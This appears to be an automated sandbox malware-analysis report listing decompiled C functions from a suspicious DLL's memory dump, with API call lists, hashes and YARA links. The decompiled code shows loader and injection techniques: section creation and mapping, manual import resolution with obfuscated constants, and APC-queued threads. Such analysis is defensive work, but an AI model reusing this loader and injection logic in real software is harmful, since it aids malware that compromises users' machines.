                                                                                                            • String ID: @Mxt MxtTxt$`RxtAxt
                                                                                                            • API String ID: 1724014008-1957990577
                                                                                                            • Opcode ID: 440532e5d3c88efd07cd344720d4500a0d4b4758782c38b16a7022c1b1eb31ef
                                                                                                            • Instruction ID: 5c9a9b96623363010087b9b91e752c165f83f85cc1fe91944f22696291a146f3
                                                                                                            • Opcode Fuzzy Hash: 440532e5d3c88efd07cd344720d4500a0d4b4758782c38b16a7022c1b1eb31ef
                                                                                                            • Instruction Fuzzy Hash: 7121BDB7E0012ABFDB10AFA8CC84FDE77B8EB4E364F114525F615DB180D67499518BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0315C6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120sleepnativesynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E6F0315C6(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E6F031825();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E6F031000(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E6F031397(_t57);
						}
					} while (_v8 != 0);
					_t27 = E6F03189E(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E6F03153C(E6F0310B9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E6F031AD7(_t53,  &_a4) != 0) {
					 *0x6f0341b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x6f0341b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E6F031000(_t60 + _t19);
				 *0x6f0341b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E6F031397(_t52);
				goto L18;
			}
























                                                                                                            0x6f0315cc
                                                                                                            0x6f0315d1
                                                                                                            0x6f0315d6
                                                                                                            0x6f031701
                                                                                                            0x6f031701
                                                                                                            0x6f0315df
                                                                                                            0x6f0315df
                                                                                                            0x6f0315e3
                                                                                                            0x6f0315e6
                                                                                                            0x6f0315e7
                                                                                                            0x6f0315ed
                                                                                                            0x6f0315f1
                                                                                                            0x6f031628
                                                                                                            0x6f0315f3
                                                                                                            0x6f0315fb
                                                                                                            0x6f031601
                                                                                                            0x6f031603
                                                                                                            0x6f031608
                                                                                                            0x6f03160e
                                                                                                            0x6f031610
                                                                                                            0x6f031610
                                                                                                            0x6f031617
                                                                                                            0x6f03161d
                                                                                                            0x6f03161d
                                                                                                            0x6f031621
                                                                                                            0x6f031621
                                                                                                            0x6f03162f
                                                                                                            0x6f031636
                                                                                                            0x6f03163f
                                                                                                            0x6f031642
                                                                                                            0x6f031648
                                                                                                            0x6f03164b
                                                                                                            0x6f031654
                                                                                                            0x6f0316fd
                                                                                                            0x00000000
                                                                                                            0x6f0316ff
                                                                                                            0x6f03165d
                                                                                                            0x6f0316ae
                                                                                                            0x6f0316ae
                                                                                                            0x6f0316c4
                                                                                                            0x6f0316c8
                                                                                                            0x6f0316f0
                                                                                                            0x6f0316ca
                                                                                                            0x6f0316cd
                                                                                                            0x6f0316d3
                                                                                                            0x6f0316d8
                                                                                                            0x6f0316df
                                                                                                            0x6f0316df
                                                                                                            0x6f0316e6
                                                                                                            0x6f0316e6
                                                                                                            0x6f0316f3
                                                                                                            0x6f0316f9
                                                                                                            0x6f0316fb
                                                                                                            0x6f0316fb
                                                                                                            0x00000000
                                                                                                            0x6f0316f9
                                                                                                            0x6f03166a
                                                                                                            0x6f0316a8
                                                                                                            0x00000000
                                                                                                            0x6f0316a8
                                                                                                            0x6f03166c
                                                                                                            0x6f031671
                                                                                                            0x6f031678
                                                                                                            0x6f03167a
                                                                                                            0x6f03167e
                                                                                                            0x6f0316a0
                                                                                                            0x6f0316a0
                                                                                                            0x00000000
                                                                                                            0x6f0316a0
                                                                                                            0x6f031680
                                                                                                            0x6f031685
                                                                                                            0x6f03168a
                                                                                                            0x6f031691
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031696
                                                                                                            0x6f031699
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F031825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F0315D1), ref: 6F031834
                                                                                                              • Part of subcall function 6F031825: GetVersion.KERNEL32 ref: 6F031843
                                                                                                              • Part of subcall function 6F031825: GetCurrentProcessId.KERNEL32 ref: 6F03185F
                                                                                                              • Part of subcall function 6F031825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F031878
                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
                                                                                                            • NtQuerySystemInformation.NTDLL ref: 6F0315FB
                                                                                                            • Sleep.KERNELBASE(00000000,00000000,00000030,747863F0,00000000), ref: 6F031642
                                                                                                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6F031678
                                                                                                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6F031696
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,6F0310B9,?,00000000), ref: 6F0316CD
                                                                                                            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6F0316DF
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6F0316E6
                                                                                                            • GetLastError.KERNEL32(6F0310B9,?,00000000), ref: 6F0316EE
                                                                                                            • GetLastError.KERNEL32 ref: 6F0316FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 3479304935-1084903527
                                                                                                            • Opcode ID: b2966e8e2b396e6b670b33018f7e70d08f927b832dc32bba056cded9a4e2eb32
                                                                                                            • Instruction ID: 1b2c2d97c6c7655deb36835c92069fe809997784507030ea1a40c92b85798bef
                                                                                                            • Opcode Fuzzy Hash: b2966e8e2b396e6b670b33018f7e70d08f927b832dc32bba056cded9a4e2eb32
                                                                                                            • Instruction Fuzzy Hash: E2319177D01A37BADB219BE48D94B9E7ABCEF4E764F140122E500E7140DB34EA419BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F045600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0313B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E6F0313B8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6F031273(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                            0x6f0313c1
                                                                                                            0x6f0313c8
                                                                                                            0x6f0313c9
                                                                                                            0x6f0313ca
                                                                                                            0x6f0313cb
                                                                                                            0x6f0313cc
                                                                                                            0x6f0313dd
                                                                                                            0x6f0313e1
                                                                                                            0x6f0313f5
                                                                                                            0x6f0313f8
                                                                                                            0x6f0313fb
                                                                                                            0x6f031402
                                                                                                            0x6f031405
                                                                                                            0x6f03140c
                                                                                                            0x6f03140f
                                                                                                            0x6f031412
                                                                                                            0x6f031415
                                                                                                            0x6f03141a
                                                                                                            0x6f031455
                                                                                                            0x6f03141c
                                                                                                            0x6f03141f
                                                                                                            0x6f031425
                                                                                                            0x6f03142a
                                                                                                            0x6f03142e
                                                                                                            0x6f03144c
                                                                                                            0x6f031430
                                                                                                            0x6f031437
                                                                                                            0x6f031445
                                                                                                            0x6f031445
                                                                                                            0x6f03142e
                                                                                                            0x6f03145d

                                                                                                            APIs
                                                                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 6F031415
                                                                                                              • Part of subcall function 6F031273: NtMapViewOfSection.NTDLL(00000000,000000FF,6F03142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6F03142A,?), ref: 6F0312A0
                                                                                                            • memset.NTDLL ref: 6F031437
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Section$CreateViewmemset
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2533685722-2766056989
                                                                                                            • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                            • Instruction ID: b86e538307bcd560f8699abeebeeeff8bc10f221715366fc96e5c7b5b8a59cfc
                                                                                                            • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                            • Instruction Fuzzy Hash: D9211DB6D00219AFDB01CFA9C884ADEFBF9FF48354F508529E655F7210D734AA448BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031DE5, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031DE5(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6f0341c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                            0x6f031de5
                                                                                                            0x6f031dee
                                                                                                            0x6f031df3
                                                                                                            0x6f031df9
                                                                                                            0x6f031e02
                                                                                                            0x6f031e08
                                                                                                            0x6f031e0a
                                                                                                            0x6f031e0d
                                                                                                            0x6f031e12
                                                                                                            0x6f031e19
                                                                                                            0x6f031e19
                                                                                                            0x6f031e1d
                                                                                                            0x6f031e23
                                                                                                            0x6f031e28
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031e2e
                                                                                                            0x6f031e38
                                                                                                            0x6f031e3a
                                                                                                            0x6f031e3d
                                                                                                            0x6f031e40
                                                                                                            0x6f031e44
                                                                                                            0x6f031e4c
                                                                                                            0x6f031e4e
                                                                                                            0x6f031e51
                                                                                                            0x6f031eb9
                                                                                                            0x6f031eb9
                                                                                                            0x6f031ebd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031e56
                                                                                                            0x6f031e5c
                                                                                                            0x6f031e5e
                                                                                                            0x6f031e71
                                                                                                            0x6f031e74
                                                                                                            0x6f031e74
                                                                                                            0x6f031e74
                                                                                                            0x6f031e78
                                                                                                            0x6f031e60
                                                                                                            0x6f031e60
                                                                                                            0x6f031e68
                                                                                                            0x6f031e6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031e6a
                                                                                                            0x6f031e58
                                                                                                            0x6f031e58
                                                                                                            0x6f031e6c
                                                                                                            0x6f031e6c
                                                                                                            0x6f031e6c
                                                                                                            0x6f031e7b
                                                                                                            0x6f031e7e
                                                                                                            0x6f031e80
                                                                                                            0x6f031e87
                                                                                                            0x6f031e82
                                                                                                            0x6f031e82
                                                                                                            0x6f031e82
                                                                                                            0x6f031e8f
                                                                                                            0x6f031e95
                                                                                                            0x6f031e97
                                                                                                            0x6f031ec7
                                                                                                            0x6f031e99
                                                                                                            0x6f031e99
                                                                                                            0x6f031e9c
                                                                                                            0x6f031e9e
                                                                                                            0x6f031ea6
                                                                                                            0x6f031ea6
                                                                                                            0x6f031eab
                                                                                                            0x6f031ead
                                                                                                            0x6f031eb4
                                                                                                            0x6f031eb6
                                                                                                            0x6f031eb6
                                                                                                            0x6f031eb6
                                                                                                            0x00000000
                                                                                                            0x6f031eb6
                                                                                                            0x00000000
                                                                                                            0x6f031e97
                                                                                                            0x6f031e46
                                                                                                            0x6f031e46
                                                                                                            0x6f031e4a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031e4a
                                                                                                            0x6f031eca
                                                                                                            0x6f031eca
                                                                                                            0x6f031ed1
                                                                                                            0x6f031ed6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031edc
                                                                                                            0x6f031ee7
                                                                                                            0x00000000
                                                                                                            0x6f031ee7
                                                                                                            0x6f031ede
                                                                                                            0x6f031ede
                                                                                                            0x6f031ee4
                                                                                                            0x00000000
                                                                                                            0x6f031ee4
                                                                                                            0x6f031e12
                                                                                                            0x6f031ee8
                                                                                                            0x6f031eed

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6F031E1D
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6F031E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574300362-0
                                                                                                            • Opcode ID: cf72615dc753a5f6fa84336d7d4741fb62cec8a52b43e06e745c7156286fbbae
                                                                                                            • Instruction ID: 6e5e13d13c0df0ccbd1b18a019aca08e28ee2344b26178da9f5ffc09f7668914
                                                                                                            • Opcode Fuzzy Hash: cf72615dc753a5f6fa84336d7d4741fb62cec8a52b43e06e745c7156286fbbae
                                                                                                            • Instruction Fuzzy Hash: B3312A76E00227DFDB14CF99C890BADB7F6BF09314B10416AD811EB240E736EA40CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031273, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E6F031273(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                            0x6f031285
                                                                                                            0x6f03128b
                                                                                                            0x6f031299
                                                                                                            0x6f0312a0
                                                                                                            0x6f0312a5
                                                                                                            0x6f0312ab
                                                                                                            0x00000000
                                                                                                            0x6f0312ac
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,6F03142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6F03142A,?), ref: 6F0312A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: SectionView
                                                                                                            • String ID:
                                                                                                            • API String ID: 1323581903-0
                                                                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                            • Instruction ID: a14eebcffd2d8948593396a6fee9fe69d63e93d4d82821a7c407591dcc4f052c
                                                                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                            • Instruction Fuzzy Hash: 66F012B6D0020DBFEB119FA5CC85D9FBBBDEF48354B104A39B152E1090D6309E588A60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031B59, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6f034188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6f03418c;
						if( *0x6f03418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6f034198;
								if( *0x6f034198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6f03418c);
						}
						HeapDestroy( *0x6f034190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6f034188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6f034190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6f0341b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6F03153C(E6F031719, E6F031C35(_a12, 1, 0x6f034198, _t41));
							 *0x6f03418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                            0x6f031b5c
                                                                                                            0x6f031b68
                                                                                                            0x6f031b6a
                                                                                                            0x6f031b6d
                                                                                                            0x6f031be3
                                                                                                            0x6f031be9
                                                                                                            0x6f031beb
                                                                                                            0x6f031bed
                                                                                                            0x6f031bf3
                                                                                                            0x6f031bf5
                                                                                                            0x6f031bfa
                                                                                                            0x6f031bfd
                                                                                                            0x6f031c08
                                                                                                            0x6f031c0a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031c0c
                                                                                                            0x6f031c0f
                                                                                                            0x6f031c11
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031c11
                                                                                                            0x6f031c19
                                                                                                            0x6f031c19
                                                                                                            0x6f031c25
                                                                                                            0x6f031c25
                                                                                                            0x6f031b6f
                                                                                                            0x6f031b70
                                                                                                            0x6f031b90
                                                                                                            0x6f031b96
                                                                                                            0x6f031b9b
                                                                                                            0x6f031b9d
                                                                                                            0x6f031bd9
                                                                                                            0x6f031bd9
                                                                                                            0x6f031b9f
                                                                                                            0x6f031ba7
                                                                                                            0x6f031bae
                                                                                                            0x6f031bb8
                                                                                                            0x6f031bc4
                                                                                                            0x6f031bc9
                                                                                                            0x6f031bd0
                                                                                                            0x6f031bd5
                                                                                                            0x00000000
                                                                                                            0x6f031bd5
                                                                                                            0x6f031bd0
                                                                                                            0x6f031b9d
                                                                                                            0x6f031b70
                                                                                                            0x6f031c32

                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(6F034188), ref: 6F031B7B
                                                                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6F031B90
                                                                                                              • Part of subcall function 6F03153C: CreateThread.KERNELBASE ref: 6F031553
                                                                                                              • Part of subcall function 6F03153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F031568
                                                                                                              • Part of subcall function 6F03153C: GetLastError.KERNEL32(00000000), ref: 6F031573
                                                                                                              • Part of subcall function 6F03153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6F03157D
                                                                                                              • Part of subcall function 6F03153C: CloseHandle.KERNEL32(00000000), ref: 6F031584
                                                                                                              • Part of subcall function 6F03153C: SetLastError.KERNEL32(00000000), ref: 6F03158D
                                                                                                            • InterlockedDecrement.KERNEL32(6F034188), ref: 6F031BE3
                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 6F031BFD
                                                                                                            • CloseHandle.KERNEL32 ref: 6F031C19
                                                                                                            • HeapDestroy.KERNEL32 ref: 6F031C25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                            • String ID: Txt
                                                                                                            • API String ID: 2110400756-4033135041
                                                                                                            • Opcode ID: 0ebac1ae4dfe5c157954ff6f747a6ff9612342e97f7f78a0dbbdf803900d8b84
                                                                                                            • Instruction ID: b071c0e274c10d1cd8487cd0386fcc6268ff14783634fd52fc8dc25bf293fe1b
                                                                                                            • Opcode Fuzzy Hash: 0ebac1ae4dfe5c157954ff6f747a6ff9612342e97f7f78a0dbbdf803900d8b84
                                                                                                            • Instruction Fuzzy Hash: 8E21AE3BE10A27FBCF20AFA9CC84B497BF8FB5E2747500826E506DB140E3359811AB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F03153C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                                                                                                            Download Yara Rule
